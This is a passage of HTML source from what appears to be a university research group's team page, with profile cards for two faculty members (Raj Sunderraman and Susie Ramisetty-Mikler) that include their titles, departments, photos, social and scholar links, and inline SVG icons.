version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 